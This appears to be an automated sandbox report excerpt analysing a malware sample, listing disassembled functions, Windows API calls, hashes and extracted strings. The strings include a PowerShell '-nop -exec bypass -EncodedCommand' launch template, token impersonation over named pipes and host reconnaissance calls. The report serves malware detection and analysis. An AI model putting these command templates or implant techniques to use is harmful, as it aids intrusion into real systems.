                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                    • String ID: /'); %s
                    • API String ID: 1314452303-1283008465
                    • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                    • Instruction ID: 2e1e53b0162e0ebcb552ed176464fe12739a6b053966d81585ff3166033a2d9c
                    • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                    • Instruction Fuzzy Hash: 0DA1D13530068186DB18FBB2E8917EE7392ABA67C1F804125FE5A47796DF3CC806C741
                    Function 0067B47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                    • malloc.LIBCMT ref: 0067B528
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                    • GetComputerNameExA.KERNEL32 ref: 0067B5EA
                    • GetComputerNameA.KERNEL32 ref: 0067B61F
                    • GetUserNameA.ADVAPI32 ref: 0067B654
                      • Part of subcall function 0066F014: WSASocketA.WS2_32 ref: 0066F042
                    • malloc.LIBCMT ref: 0067B76D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                    • String ID: VUUU
                    • API String ID: 632458648-2040033107
                    • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                    • Instruction ID: d29d9931251baad784a1826376812f60e93414938d2a0f9df4c39f6f065345ae
                    • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                    • Instruction Fuzzy Hash: 69913636700A9086EB44EF6AD8653AD2353BB89BC4FC0D029EE0D5BB56DF39C945C704
                    Function 001AE004 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf
                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                    • API String ID: 3512837008-1250630670
                    • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                    • Instruction ID: 6a465962cabf8489c5691470ad028bed19716a351b7ab40bfcc4a69e4c0c2c17
                    • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                    • Instruction Fuzzy Hash: 7A719976300B85A6EB10DF61E8807ED77A1F799788F840526EE4E13BA8DF78C509C700
                    Function 00671478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                    • GetStartupInfoA.KERNEL32 ref: 00671540
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                    • GetCurrentDirectoryW.KERNEL32 ref: 006715CD
                    • GetCurrentDirectoryW.KERNEL32 ref: 006715DC
                    • CreateProcessWithLogonW.ADVAPI32 ref: 00671637
                    • GetLastError.KERNEL32 ref: 00671641
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                    • String ID: %s as %s\%s: %d
                    • API String ID: 3435635427-816037529
                    • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                    • Instruction ID: 80a158382953b88b06e520f675666d0f8cd5c6e7d3343fb356ae6e5c51471de1
                    • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                    • Instruction Fuzzy Hash: 35515A32204B8186DB60DF16F85475AB7AAF789B80F54802AEF8D97F29DF39C055CB44
                    Function 001B0A94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                      • Part of subcall function 001BFA20: _errno.LIBCMT ref: 001BF977
                      • Part of subcall function 001BFA20: _invalid_parameter_noinfo.LIBCMT ref: 001BF982
                    • fseek.LIBCMT ref: 001B0B30
                      • Part of subcall function 001C02A4: _errno.LIBCMT ref: 001C02CC
                      • Part of subcall function 001C02A4: _invalid_parameter_noinfo.LIBCMT ref: 001C02D7
                    • _ftelli64.LIBCMT ref: 001B0B38
                      • Part of subcall function 001C0318: _errno.LIBCMT ref: 001C0336
                      • Part of subcall function 001C0318: _invalid_parameter_noinfo.LIBCMT ref: 001C0341
                    • fseek.LIBCMT ref: 001B0B48
                      • Part of subcall function 001C02A4: _fseek_nolock.LIBCMT ref: 001C02F5
                    • malloc.LIBCMT ref: 001B0B88
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                      • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                    • fclose.LIBCMT ref: 001B0C45
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                    • String ID: mode
                    • API String ID: 1756087678-2976727214
                    • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                    • Instruction ID: 90d0e5ddde56df2123dc45e1f2ef815405a37f99bc65f5c34af3800dbad401eb
                    • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                    • Instruction Fuzzy Hash: B541D82631468082DB14EB12E8557AE7752F7EDBD0F808226EE5E47B96DF3CC506CB40
                    Function 001B8620 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 87COMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001B864F
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • _snprintf.LIBCMT ref: 001B8667
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • free.LIBCMT ref: 001B867E
                      • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                    • malloc.LIBCMT ref: 001B86CE
                    • _snprintf.LIBCMT ref: 001B86E6
                    • free.LIBCMT ref: 001B870E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                    • String ID: /'); %s
                    • API String ID: 761449704-1283008465
                    • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                    • Instruction ID: 53664babb93e745c368a5b9844ddd80b759a732194ffa29d953fd55d02d63f9f
                    • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                    • Instruction Fuzzy Hash: 193135213006C125DA199FA36C143E9BB66B79AFE4F984112DEE507BA6CF3CC443C300
                    Function 0067E98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$OpenProcessToken
                    • String ID:
                    • API String ID: 2009710997-0
                    • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                    • Instruction ID: be70d9a1b9824e6d91bdd001a0645cfd12320119953c9e94c73a6e9c154cd505
                    • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                    • Instruction Fuzzy Hash: 0C21C425304B0186EB54AF62E46475A67A3FBC8BA4F14803CAE4E43B15DF3EC44ACB84
                    Function 001BF210 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001BF236
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001BF242
                    • __crtIsPackagedApp.LIBCMT ref: 001BF253
                    • _dosmaperr.LIBCMT ref: 001BF29D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2917016420-0
                    • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                    • Instruction ID: 3ed8b6cf709debf8d3d5eb5d30d3862baa036c4a4594f282fce4260f8f547789
                    • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                    • Instruction Fuzzy Hash: 0821CF36300B4096EB14AF76AC153ADB7E1FBA9BA4F184639EE49437A5DF3CC4428700
                    Function 0068FBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068FC04
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 0068FC1F
                    • _invalid_parameter_noinfo.LIBCMT ref: 0068FC2A
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3191669884-0
                    • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                    • Instruction ID: d3b0a8c39b02e232e219af6ac56bdc75e73b4ff08cdd2bd878a79b47920382d2
                    • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                    • Instruction Fuzzy Hash: 482183723047888AD761AF11D48469EB7A6FB95BE0F684335EF5817B55CB34CA82C700
                    Function 001CEFD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CF004
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001CF01F
                    • _invalid_parameter_noinfo.LIBCMT ref: 001CF02A
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3191669884-0
                    • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                    • Instruction ID: 0ce4bd91c6ac52b6e23cc360a9f001d43c82dac6a01da28f891c7d467d7c2d83
                    • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                    • Instruction Fuzzy Hash: 45218B722047848AD7109F52D485F69B7A6F7A9FE0F69823DEF5807B46CB34C856CB00
                    Function 0067596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTickioctlsocket
                    • String ID:
                    • API String ID: 3686034022-0
                    • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                    • Instruction ID: bbe50e0202cb6f6ad8ee280aec3c1a58fbc916d8ae08fde82de85a24ae74b9b2
                    • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                    • Instruction Fuzzy Hash: 94112932704EC197E7108B69E8543597322E784BB4F504220DB4E86EA0DFBDCC99CB50
                    Function 00670AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                    • String ID:
                    • API String ID: 4232080776-0
                    • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                    • Instruction ID: b18c62b105e39fa9bd382888b4b7a9ba732a94301dd04494ffbb538dad6fbaa7
                    • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                    • Instruction Fuzzy Hash: 7311E331710642C6F750AB25EC647AA3327FBC4B44F848116890E82E60DF3EC568CB62
                    Function 00680B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                    • String ID:
                    • API String ID: 2328795619-0
                    • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                    • Instruction ID: 482e37c5ac51eca48aac66d78720c05e2b5d2f6479f3cc17f4d53c8a761545bf
                    • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                    • Instruction Fuzzy Hash: AF51603170475086FB98BE6695005AAB693F755FF8F148F24AE3947FD4CB38D49A8340
                    Function 001BFF10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                    • String ID:
                    • API String ID: 2328795619-0
                    • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                    • Instruction ID: c862a0ed6b8f5ce2fa69b836523f6c9ead2efe547d3ca5b4723f08b5149bf0ef
                    • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                    • Instruction Fuzzy Hash: 07512C32704350C69B198A665900BBAB691B769BF4F19872DFF7943FD5CB38C4A28740
                    Function 001B1030 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 150COMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001B1063
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                      • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                    • free.LIBCMT ref: 001B115E
                    • free.LIBCMT ref: 001B116B
                      • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$freemalloc$_callnewh
                    • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                    • API String ID: 2029259483-317027030
                    • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                    • Instruction ID: c88a008fba11b0880876a59c021beeebc6c3bd86dbfa66db4d61d791c2e2c4ff
                    • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                    • Instruction Fuzzy Hash: 4651C072708790A6DB10DF66E4503EEB7A2F399B94F404016EE8A47B58EF7CC609CB40
                    Function 0068A348 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _mtinitlocknum.LIBCMT ref: 0068A375
                      • Part of subcall function 00683E58: _FF_MSGBANNER.LIBCMT ref: 00683E75
                      • Part of subcall function 00683E58: _NMSG_WRITE.LIBCMT ref: 00683E7F
                    • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0068A3F8
                    • EnterCriticalSection.KERNEL32 ref: 0068A414
                    • LeaveCriticalSection.KERNEL32 ref: 0068A424
                    • _calloc_crt.LIBCMT ref: 0068A49A
                    • __lock_fhandle.LIBCMT ref: 0068A502
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                    • String ID:
                    • API String ID: 445582508-0
                    • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                    • Instruction ID: 4914a5b9f05a24cbee6919df2c3318ca5fba6cc4527ed45511ea0f3f6cba0893
                    • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                    • Instruction Fuzzy Hash: 0E51F33260078082EF20EF54D45436DB7ABFB94B58F19471ADE4E477A0DBB8C956C702
                    Function 00671694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                      • Part of subcall function 00680620: _errno.LIBCMT ref: 00680577
                      • Part of subcall function 00680620: _invalid_parameter_noinfo.LIBCMT ref: 00680582
                    • fseek.LIBCMT ref: 00671730
                      • Part of subcall function 00680EA4: _errno.LIBCMT ref: 00680ECC
                      • Part of subcall function 00680EA4: _invalid_parameter_noinfo.LIBCMT ref: 00680ED7
                    • _ftelli64.LIBCMT ref: 00671738
                      • Part of subcall function 00680F18: _errno.LIBCMT ref: 00680F36
                      • Part of subcall function 00680F18: _invalid_parameter_noinfo.LIBCMT ref: 00680F41
                    • fseek.LIBCMT ref: 00671748
                      • Part of subcall function 00680EA4: _fseek_nolock.LIBCMT ref: 00680EF5
                    • GetFullPathNameA.KERNEL32 ref: 0067176B
                    • malloc.LIBCMT ref: 00671788
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                      • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                    • fclose.LIBCMT ref: 00671845
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                    • String ID:
                    • API String ID: 3587854850-0
                    • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                    • Instruction ID: 7ab80978dd0f55085e882ccbcc8fdfab77c345480eb8815360099638d3a819f6
                    • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                    • Instruction Fuzzy Hash: CB41F52271468082DB84EB26E41576E6353F7C9BD0F90C22AEE5E4BB96DF3DC506CB05
                    Function 00675C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetACP.KERNEL32 ref: 00675C78
                    • GetOEMCP.KERNEL32 ref: 00675C82
                    • GetCurrentProcessId.KERNEL32 ref: 00675CA8
                    • GetTickCount.KERNEL32 ref: 00675CB0
                      • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                    • GetCurrentProcess.KERNEL32 ref: 00675CEC
                      • Part of subcall function 00670C64: GetModuleHandleA.KERNEL32 ref: 00670C79
                      • Part of subcall function 00670C64: GetProcAddress.KERNEL32 ref: 00670C89
                    • GetCurrentProcessId.KERNEL32 ref: 00675D5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                    • String ID:
                    • API String ID: 3426420785-0
                    • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                    • Instruction ID: a31f047bb2689254cef874948690ad23f5f662dbf2868a21ec4335529d286551
                    • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                    • Instruction Fuzzy Hash: EB410662710611A5FF40EBB1DC6579D33ABBF89784F40441AEE0D87A69EF3AC10AC758
                    Function 00676F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 00676F5E
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • htonl.WS2_32 ref: 00676F91
                    • recvfrom.WS2_32 ref: 00676FD5
                    • WSAGetLastError.WS2_32 ref: 00676FE2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                    • String ID:
                    • API String ID: 2310505145-0
                    • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                    • Instruction ID: dacedd6afec655f8603582c3147e2722dd160d8df43d601f604d9943b79852a0
                    • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                    • Instruction Fuzzy Hash: 5A41C272304B80C2EB10DF25E85476A77A3F799BA8F148225EA8D47B68DF39C491CF41
                    Function 006779C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                    • String ID:
                    • API String ID: 1014270282-0
                    • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                    • Instruction ID: 76af5c70d6d55f15a5d3e694d8c45974960cfc59736c55926a841bf454df5036
                    • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                    • Instruction Fuzzy Hash: 9B319E3221878486EB20CF52D40439977A6F789FD8F088229EE4D47B58DF7DC605CB04
                    Function 00680620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                    • String ID:
                    • API String ID: 1547050394-0
